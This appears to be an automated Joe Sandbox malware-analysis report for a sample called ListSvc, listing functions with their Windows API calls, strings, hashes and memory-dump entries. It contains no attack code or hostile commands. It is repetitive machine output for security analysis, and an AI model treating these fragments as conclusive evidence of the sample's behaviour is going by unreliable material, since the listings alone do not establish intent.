Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9

Uniqueness

Uniqueness Score: -1.00%

Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Open
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 71445658-1109908249
Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4

Uniqueness

Uniqueness Score: -1.00%

Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
Opcode Fuzzy Hash: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 005D0A74, Relevance: 3.1, APIs: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 005CE26C: GetDC.USER32(00000000), ref: 005CE27D
Part of subcall function 005CE26C: SelectObject.GDI32(00000001,00000000), ref: 005CE29F
Part of subcall function 005CE26C: GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
Part of subcall function 005CE26C: GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
Part of subcall function 005CE26C: ReleaseDC.USER32 ref: 005CE2F2

MulDiv.KERNEL32(006B66BF,00000006,00000006), ref: 005D0B41
MulDiv.KERNEL32(?,?,0000000D), ref: 005D0B58

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Text$ExtentMetricsObjectPointReleaseSelect
String ID:
API String ID: 844173074-0
Opcode ID: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
Instruction ID: 4b3286446c155bbe1f679e64263f80cdfde84c69ba5731eb2fff00bff0d4e1b0
Opcode Fuzzy Hash: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
Instruction Fuzzy Hash: 8F41E735A00108EFDB00DBA8D986EADB7F9FB88704F1541A6F904EB361D771AE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59

Uniqueness

Uniqueness Score: -1.00%

Function 00414020, Relevance: 3.1, APIs: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 0041404A
GetProcAddress.KERNEL32(?,00000000), ref: 00414083

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
Instruction ID: b41df1fa75d381eed13266955d9feb05bf3a80cdd3b44aa66b38c7297c5ee5d6
Opcode Fuzzy Hash: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
Instruction Fuzzy Hash: 3C11C631604208AFD701DF22CC529AD7BECEB8E714BA2047AF904E3680DB385F549599

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99

Uniqueness

Uniqueness Score: -1.00%

Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15

Uniqueness

Uniqueness Score: -1.00%

Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005ABB9E
EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$CurrentEnumWindows
String ID:
API String ID: 2396873506-0
Opcode ID: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
Opcode Fuzzy Hash: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994

Uniqueness

Uniqueness Score: -1.00%

Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698

Uniqueness

Uniqueness Score: -1.00%

Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B852
LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000,00000000), ref: 0042B881

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8

Uniqueness

Uniqueness Score: -1.00%

Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 005B8281
SetWindowTextW.USER32(?,00000000), ref: 005B8297

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA

Uniqueness

Uniqueness Score: -1.00%

Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

Common Files, xrefs: 006AC393
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
cmd.exe, xrefs: 006AC53B
\Program Files, xrefs: 006AC349
CommonFilesDir, xrefs: 006AC35C, 006AC3D8
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
COMMAND.COM, xrefs: 006AC55C

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
